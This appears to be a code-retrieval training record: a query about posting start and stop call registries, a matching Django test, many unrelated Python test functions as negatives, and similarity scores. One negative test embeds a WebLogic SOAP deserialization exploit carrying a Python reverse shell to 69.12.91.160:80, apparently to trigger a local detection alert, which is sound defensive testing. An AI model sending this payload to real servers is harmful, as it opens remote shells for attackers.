{\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def test_micro_service():\n data_list = [\"1\", \"2\", \"3\"]\n service_list = []\n for d in data_list:\n service = MicroService()\n service.process = create_process_func(d)\n service_list.append(service)\n\n service_queue = build_micro_service_queue(service_list)\n test_data = \"test_data\"\n context = Context()\n context.state = State()\n data = service_queue.process_service_queue(context, test_data)\n\n for d in data_list:\n test_data = \"{}{}\".format(test_data, d)\n\n assert data == test_data", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_run_started(self):", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "async def test_get_dispatch_route_by_id(client):\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test(self):\n exploit = \"\"\"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>/bin/sh</string>\n </void>\n <void index=\"1\">\n <string>-c</string>\n </void>\n <void index=\"2\">\n <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.c\"\"\" \\\n \"\"\"onnect((\"69.12.91.160\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=\"\"\" \\\n \"\"\"subprocess.call([\"/bin/sh\",\"-i\"]);'</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\"\"\"\n requests.post(\"http://127.0.0.1:{}/wls-wsat/CoordinatorPortType\".format(WEBLOGIC_PORT), data=exploit)\n\n return [WEBLOGIC_ALERT_TYPE_NAME]", "async def test_service_refresh_devices(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 0\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Sensor 1 name\",\n \"type\": \"ZHALightLevel\",\n \"state\": {\"lightlevel\": 30000, \"dark\": False},\n \"config\": {\"reachable\": True},\n \"uniqueid\": \"00:00:00:00:00:00:00:02-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_collection_controller_run_countdown_calls(setup_controller, mock_run):\n # given\n sources = {\n 'kraken': KrakenOHLCV(Interval.MINUTE, SymbolPair(Symbol.BITCOIN, Symbol.USD), 719),\n 'crypto_compare': CryptoCompareOHLCV(Interval.MINUTE, SymbolPair(Symbol.BITCOIN, Symbol.USD), 2000),\n }\n controller = setup_controller(sources, 2, 120)\n mock_run(sources)\n # when\n controller.run()\n # then\n expected = [call(1560123060.0), call(1560123180.0), call(1560144630.0), call(1560183180.0)]\n assert utils.time.countdown.call_args_list == expected", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> None:\n respx.post(f\"http://{host}:80/axis-cgi/apidiscovery.cgi\").respond(\n json=API_DISCOVERY_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/basicdeviceinfo.cgi\").respond(\n json=BASIC_DEVICE_INFO_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/io/portmanagement.cgi\").respond(\n json=PORT_MANAGEMENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/lightcontrol.cgi\").respond(\n json=LIGHT_CONTROL_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/mqtt/client.cgi\").respond(\n json=MQTT_CLIENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/streamprofile.cgi\").respond(\n json=STREAM_PROFILES_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/viewarea/info.cgi\").respond(\n json=VIEW_AREAS_RESPONSE\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Brand\"\n ).respond(\n text=BRAND_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Image\"\n ).respond(\n text=IMAGE_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Input\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.IOPort\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Output\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Properties\"\n ).respond(\n text=PROPERTIES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.PTZ\"\n ).respond(\n text=PTZ_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.StreamProfile\"\n ).respond(\n text=STREAM_PROFILES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.post(f\"http://{host}:80/axis-cgi/applications/list.cgi\").respond(\n text=APPLICATIONS_LIST_RESPONSE,\n headers={\"Content-Type\": \"text/xml\"},\n )\n respx.post(f\"http://{host}:80/local/vmd/control.cgi\").respond(json=VMD4_RESPONSE)", "def test_10_9_4_2_3_1_3(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # First successful Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)\n del request, response\n\n # operationState is missing\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['response']['responseCode'], 102)", "def test_batch(self):\n req = '''[{\"foo\": \"boo\"},\n {\"jsonrpc\": \"2.0\", \"method\": \"notify_hello\", \"params\": [7]},\n {\"jsonrpc\": \"2.0\", \"method\": \"subtract\", \"params\": [42,23], \"id\": \"2\"},\n {\"jsonrpc\": \"2.0\", \"method\": \"foo.get\", \"params\": {\"name\": \"myself\"}, \"id\": \"5\"}\n ]'''\n\n resp = '''[{\"jsonrpc\": \"2.0\", \"error\": {\"code\": -32600, \"message\": \"InvalidRequestError: Invalid members in request object\"}, \"id\": null},\n {\"jsonrpc\": \"2.0\", \"result\": 19, \"id\": \"2\"},\n {\"jsonrpc\": \"2.0\", \"id\": \"5\", \"error\": {\"message\": \"MethodNotFoundError: Method foo.get not found\", \"code\": -32601}}\n ]'''\n\n status = 200\n r_status, r_resp = self.exec_handler(req)\n self.assertEqual(r_status, status)\n self.assertEqual(simplejson.loads(r_resp), simplejson.loads(resp))", "def program_start_stop_response_fixture() -> dict[str, Any]:\n return cast(\n dict[str, Any], json.loads(load_fixture(\"program_start_stop_response.json\"))\n )", "def test_10_9_4_1_1_1(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)" ]
[ "0.8484062", "0.75393564", "0.7322953", "0.722341", "0.6426046", "0.62504566", "0.6230039", "0.6164438", "0.59421086", "0.59283173", "0.5919254", "0.58633626", "0.58341634", "0.58131343", "0.5774062", "0.57502663", "0.56712496", "0.5646838", "0.56402326", "0.5634627", "0.56305146", "0.55820596", "0.5575428", "0.55573285", "0.5527161", "0.5521873", "0.55182016", "0.5496908", "0.54858696", "0.5474771", "0.5471524", "0.5465941", "0.54440826", "0.5443692", "0.54396427", "0.54267955", "0.5416645", "0.5397404", "0.5391385", "0.5390922", "0.53898174", "0.5389428", "0.5387801", "0.5384789", "0.5383504", "0.53803694", "0.5371299", "0.5357171", "0.5355477", "0.53491074", "0.5346791", "0.53402585", "0.5334859", "0.533314", "0.5331193", "0.5326101", "0.53120124", "0.5310904", "0.53057235", "0.53043985", "0.5294298", "0.5290404", "0.528842", "0.5285166", "0.5280448", "0.52729034", "0.527209", "0.52621377", "0.52594733", "0.5248786", "0.52476406", "0.5244737", "0.5243314", "0.5242774", "0.5240708", "0.52405614", "0.52372336", "0.5236698", "0.5234035", "0.5230023", "0.5215871", "0.52148145", "0.5211928", "0.5210353", "0.5208954", "0.51945716", "0.519444", "0.51904166", "0.5188891", "0.51869977", "0.51841", "0.5181114", "0.517983", "0.51785386", "0.5177475", "0.5166816", "0.5163055", "0.5156724", "0.5155637", "0.51539403" ]
0.8285663
1
Test POSTing two start registries and only one stop registry and expect to GET only on record on Call API Endpoint. Test uses start_call_fx fixture Test uses stop_call_fx fixture
def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx): post_url = reverse_lazy('calls:registry-list') start_call_fx_2 = copy(start_call_fx) start_call_fx_2['call_id'] = 2 post_data = [start_call_fx, start_call_fx_2, stop_call_fx] for data in post_data: response = client.post(post_url, data, content_type='application/json') assert response.status_code == status.HTTP_201_CREATED get_url = reverse_lazy('calls:call-list') response = client.get(get_url) assert len(response.data) == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": \"3.3.3.3\"}})", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app1', 'epg1')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app2', 'epg2')\n mac3 = '00:11:22:33:33:36'\n ip3 = '3.4.3.7'\n self.add_endpoint(mac3, ip3, 'intersite-testsuite', 'app2', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app1-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 